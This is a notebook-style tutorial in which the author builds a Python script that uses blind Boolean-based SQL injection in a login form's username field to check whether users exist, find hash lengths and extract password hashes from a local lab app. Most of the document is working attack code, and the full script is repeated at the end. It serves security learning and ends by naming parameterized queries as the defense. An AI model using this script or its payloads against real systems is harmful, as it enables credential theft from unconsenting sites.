# Blind Boolean-Based SQL Injection to Extract Password Hashes

In this project, I developed a simple Python script to demonstrate a blind Boolean-based SQL injection attack. The script targets a vulnerable web application running locally (http://127.0.0.1:5000) and attempts to extract the password hash of a user by exploiting SQL injection vulnerabilities in the `username` parameter.

The approach follows a structured attack:
1. **Check if a user exists**.
2. **Find the password length**.
3. **Extract the password hash character by character**.

## Step 1: Imports and Setup

First, I needed to import the necessary libraries and define some important variables:
- `requests`: To send HTTP requests to the vulnerable server.
- `total_queries`: A global counter to track the number of queries sent.
- `charset`: The set of characters (hexadecimal digits in this case) to guess the password hash.
- `target`: The URL of the vulnerable web application.
- `needle`: The string `"Welcome back"`, which is the success indicator in the server's response.

In [1]:
import requests

total_queries = 0
charset = "0123456789abcdef"
target = "http://127.0.0.1:5000"
needle = "Welcome back"

## Step 2: The Injection Mechanism - injected_query
The core of the attack is the injected_query function, which sends a crafted SQL query to the server. The query modifies the username parameter, injecting a payload to check the result of a SQL condition.

The payload is designed to test whether a specific condition is true or false. If the condition is true, the server responds with "Welcome back"; otherwise, the response differs. The function checks for the presence of "Welcome back" in the response to infer if the injected condition was true or false.

In [2]:
def injected_query(payload):
    global total_queries
    r = requests.post(
        target, 
        data = {"username" : "admin' and {}".format(payload), "password" : "password"}
    )
    total_queries += 1
    return needle.encode() not in r.content


## Step 3: Testing User Validity - invalid_user
The first step in the attack is to check whether a given user exists. This is done by injecting a condition that checks if the user_id exists in the database. The query checks if (select id from user where id = {user_id}) >= 0 is true, which will only succeed if the user exists.

In [3]:
def invalid_user(user_id):
    payload = f"(select id from user where id = {user_id}) >= 0"
    return injected_query(payload)

## Step 4: Finding Password Length - password_length
Once I know that the user exists, the next step is to determine the length of their password hash. The script increments a counter i until it finds the actual password length. The condition (length(password) <= {i}) is used to test whether the password length is less than or equal to i.

In [4]:
def password_length(user_id):
    i = 0
    while True:
        payload = f"(select length(password) from user where id = {user_id} and length(password) <= {i} limit 1)"
        if not injected_query(payload):
            return i
        i += 1


## Step 5: Extracting the Password Hash - extract_hash
Once the password length is known, the script extracts each character of the password hash one by one. It does this by iterating through each character position, using a boolean_query to check whether the character at each position matches any of the possible characters in the charset.

For each character position, the query compares the character against a set of possible characters (hex digits from 0 to f). The query checks the condition (select hex(substr(password, {offset +1}, 1)) from user where id= {user_id}) {operator} hex('{character}'), adjusting the offset and character to gradually build the password hash.

In [5]:
def extract_hash(charset, user_id, password_length):
    found = ""
    for i in range(0, password_length):
        for j in range(len(charset)):
            if boolean_query(i, user_id, charset[j]):
                found += charset[j]
                break
    return found


## Step 6: The Boolean Query - boolean_query
The boolean_query function tests whether a guessed character at position i matches the actual character in the password hash. It sends the crafted SQL payload and checks whether the server response indicates that the condition is true (i.e., the guessed character is correct).

In [6]:
def boolean_query(offset, user_id, character, operator=">"):
    print(f"offset: {offset}, user_id: {user_id}, operator: {operator}")
    payload = f"(select hex(substr(password, {offset +1}, 1)) from user where id= {user_id}) {operator} hex('{character}')"
    return injected_query(payload)


## Step 7: Running the Attack
The main part of the script continuously prompts for a user_id and attempts to extract the password hash. If the user exists, the script will first calculate the password length and then extract the password hash character by character.

In [ ]:
while True:
    try:
        user_id = input("> Enter a user ID to extract the password hash: ")
        if not invalid_user(user_id):
            user_password_length = password_length(user_id)
            print(f"\t[-] User {user_id} hash length: {user_password_length}")
            print(f"\t[-] User {user_id} hash: {extract_hash(charset, int(user_id), user_password_length)}")
        else:
            print(f"\t [X] User {user_id} does not exist.")
    except KeyboardInterrupt:
        break

## Lessons Learned

Blind Boolean-Based SQL Injection: While slower than error-based or union-based SQL injection methods, blind Boolean-based SQL injection can still be highly effective for exfiltrating sensitive information like password hashes.

Structured Approach: The script uses a structured approach: first, checking if the user exists, then calculating the password length, and finally extracting the password hash character by character. This is a well-organized method for handling blind SQL injection.

Real-World Defenses: This project highlights why using prepared statements, parameterized queries, and input validation is critical to preventing such SQL injection attacks. Implementing proper logging and monitoring can also help detect and block these types of attacks.

This project provided a hands-on way to learn about SQL injection, specifically blind Boolean-based attacks. By testing various conditions to infer information, I was able to extract a password hash from a vulnerable web application. This exercise reinforced the importance of secure coding practices to prevent SQL injection vulnerabilities.

# Full Code

In [ ]:
import requests

total_queries = 0
charset = "0123456789abcdef"
target = "http://127.0.0.1:5000"
needle = "Welcome back"

def injected_query(payload):
    global total_queries
    r = requests.post(
        target, 
        data = {"username" : "admin' and {}".format(payload), "password" : "password"}
    )
    total_queries += 1
    return needle.encode() not in r.content

def boolean_query(offset, user_id, character, operator=">"):
    print(f"offset: {offset}, user_id: {user_id}, operator: {operator}")
    payload = f"(select hex(substr(password, {offset +1}, 1)) from user where id= {user_id}) {operator} hex('{character}')"
    return injected_query(payload)

def invalid_user(user_id):
    payload = f"(select id from user where id = {user_id}) >= 0"
    return injected_query(payload)

def password_length(user_id):
    i = 0
    while True:
        payload = f"(select length(password) from user where id = {user_id} and length(password) <= {i} limit 1)"
        if not injected_query(payload):
            return i
        i += 1

def extract_hash(charset, user_id, password_length):
    found = ""
    for i in range(0, password_length):
        for j in range(len(charset)):
            if boolean_query(i, user_id, charset[j]):
                found += charset[j]
                break
    return found

while True:
    try:
        user_id = input("> Enter a user ID to extract the password hash: ")
        if not invalid_user(user_id):
            user_password_length = password_length(user_id)
            print(f"\t[-] User {user_id} hash length: {user_password_length}")
            print(f"\t[-] User {user_id} hash: {extract_hash(charset, int(user_id), user_password_length)}")
        else:
            print(f"\t [X] User {user_id} does not exist.")
    except KeyboardInterrupt:
        break
